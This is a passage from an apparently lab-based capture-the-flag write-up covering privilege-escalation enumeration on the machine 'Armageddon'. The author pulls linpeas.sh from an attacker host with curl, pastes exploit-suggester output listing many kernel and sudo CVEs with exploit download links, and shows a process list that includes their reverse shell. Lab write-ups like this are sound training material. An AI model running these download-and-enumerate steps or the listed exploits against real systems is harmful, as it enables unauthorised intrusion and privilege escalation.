PEAS
sh-4.2$ curl -s http://10.10.14.2/linpeas.sh -o /dev/shm/linpeas.sh ; chmod 755 /dev/shm/linpeas.shDelivery complete
sh-4.2$ ./linpeas.sh
sh: ./linpeas.sh: Permission deniedI am unable to execute PEAS as the apache user.
This is very unusual
[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/linpeas.sh -o /home/brucetherealadmin/linpeas.sh ; chmod 755 /home/brucetherealadmin/linpeas.shSince I made a lateral movement to the brucetherealadmin user and elevated the shell session, I will re-attempt it as the brucetherealadmin user
This time, I am able to execute PEAS
CVEs
The target system is confirmed to be vulnerable to CVE-2021-4034
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: probable
Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2018-1000001] RationalLove
Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
Exposure: less probable
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-9322] BadIRET
Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
Exposure: less probable
Tags: RHEL<=7,fedora=20
Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/39230
[+] [CVE-2015-3246] userhelper
Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
Exposure: less probable
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Download URL: https://www.exploit-db.com/download/37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Exposure: less probable
Tags: debian=7.0|8.0,ubuntu=*
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2014-5207] fuse_suid
Details: https://www.exploit-db.com/exploits/34923/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/34923
[+] [CVE-2014-4014] inode_capable
Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
Exposure: less probable
Tags: ubuntu=12.04
Download URL: https://www.exploit-db.com/download/33824
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] pp_key
CVE-2016-0728
Source: http://www.exploit-db.com/exploits/39277
[3] timeoutpwn
CVE-2014-0038
Source: http://www.exploit-db.com/exploits/31346Some more CVEs
$PATH variable
The home directory of the brucetherealadmin user is part of the current $PATH variable
Processes
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 0.1 128008 6680 ? Ss 16:55 0:05 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 489 0.0 0.1 39056 4604 ? Ss 16:55 0:01 /usr/lib/systemd/systemd-journald
root 508 0.0 0.1 201112 4140 ? Ss 16:55 0:00 /usr/sbin/lvmetad -f
root 521 0.0 0.1 48940 5396 ? Ss 16:55 0:00 /usr/lib/systemd/systemd-udevd
root 643 0.0 0.0 55532 852 ? S<sl 16:55 0:00 /sbin/auditd
dbus 666 0.0 0.0 66456 2568 ? Ssl 16:55 0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
└─(Caps) 0x0000000020000000=cap_audit_write
polkitd 669 0.0 0.2 612232 10092 ? Ssl 16:55 0:00 /usr/lib/polkit-1/polkitd --no-debug
root 671 0.0 0.0 21684 1308 ? Ss 16:55 0:00 /usr/sbin/irqbalance --foreground
root 672 0.0 0.1 168148 5036 ? Ss 16:55 0:00 /usr/bin/VGAuthService -s
root 673 0.1 0.1 355212 5308 ? Ssl 16:55 0:18 /usr/bin/vmtoolsd
root 674 0.0 0.0 26384 1748 ? Ss 16:55 0:00 /usr/lib/systemd/systemd-logind
root 675 0.0 0.2 474248 10764 ? Ssl 16:55 0:04 /usr/sbin/NetworkManager --no-daemon[0m
root 676 0.0 0.7 990532 29400 ? Ssl 16:55 0:02 /usr/libexec/snapd/snapd
root 679 0.0 0.0 126392 1684 ? Ss 16:55 0:00 /usr/sbin/crond -n
root 692 0.0 0.0 110208 856 tty1 Ss+ 16:55 0:00 /sbin/agetty --noclear tty1 linux
root 963 0.0 0.4 574288 17440 ? Ssl 16:55 0:02 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 964 0.0 0.1 112936 4360 ? Ss 16:55 0:00 /usr/sbin/sshd -D
bruceth+ 5653 0.0 0.0 154728 2432 ? S 19:49 0:00 _ sshd: brucetherealadmin@pts/0
bruceth+ 5654 0.0 0.0 116056 2624 pts/0 Ss 19:49 0:00 _ -bash
bruceth+ 6160 0.2 0.0 115016 3364 pts/0 S+ 20:16 0:00 _ /bin/sh ./linpeas.sh
bruceth+ 10518 0.0 0.0 115016 2340 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
bruceth+ 10522 0.0 0.0 155588 1936 pts/0 R+ 20:18 0:00 | _ ps fauxwww
bruceth+ 10519 0.0 0.0 115016 2040 pts/0 R+ 20:18 0:00 _ /bin/sh ./linpeas.sh
bruceth+ 10521 0.0 0.0 115016 2040 pts/0 R+ 20:18 0:00 _ /bin/sh ./linpeas.sh
root 966 0.0 0.1 216400 5384 ? Ssl 16:55 0:01 /usr/sbin/rsyslogd -n
root 967 0.0 0.3 450272 15488 ? Ss 16:55 0:01 /usr/sbin/httpd -DFOREGROUND
apache 5163 4.0 0.2 450648 9896 ? S 19:42 1:28 _ /usr/sbin/httpd -DFOREGROUND
apache 5164 88.2 0.2 450648 9752 ? R 19:42 31:49 _ /usr/sbin/httpd -DFOREGROUND
apache 5512 0.0 0.0 11688 1140 ? S 19:46 0:00 | _ sh
apache 5587 0.0 0.0 11828 1772 ? S 19:46 0:00 | _ /bin/sh -i
apache 5165 6.6 0.2 450648 9952 ? S 19:42 2:22 _ /usr/sbin/httpd -DFOREGROUND
apache 5167 0.0 0.2 450272 7968 ? S 19:42 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 5168 0.0 0.2 450272 7968 ? S 19:42 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 5169 0.0 0.2 450272 7968 ? S 19:42 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 5170 0.0 0.2 450272 7968 ? S 19:42 0:00 _ /usr/sbin/httpd -DFOREGROUND
mysql 1060 0.0 0.0 113416 1592 ? Ss 16:55 0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql 1364 0.0 2.7 1102720 105488 ? Sl 16:55 0:11 _ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
root 1471 0.0 0.0 89744 2208 ? Ss 16:55 0:00 /usr/libexec/postfix/master -w
postfix 1477 0.0 0.1 89916 4088 ? S 16:55 0:00 _ qmgr -l -t unix -u
postfix 6141 0.1 0.1 89848 4072 ? S 20:15 0:00 _ pickup -l -t unix -uPEAS was able to get all the processes
/usr/lib/polkit-1/polkitd --no-debug
/usr/sbin/crond -n
sudo privileges
PEAS was also able to pick up the sudo privileges of the brucetherealadmin user
It appears that the brucetherealadmin user has a mail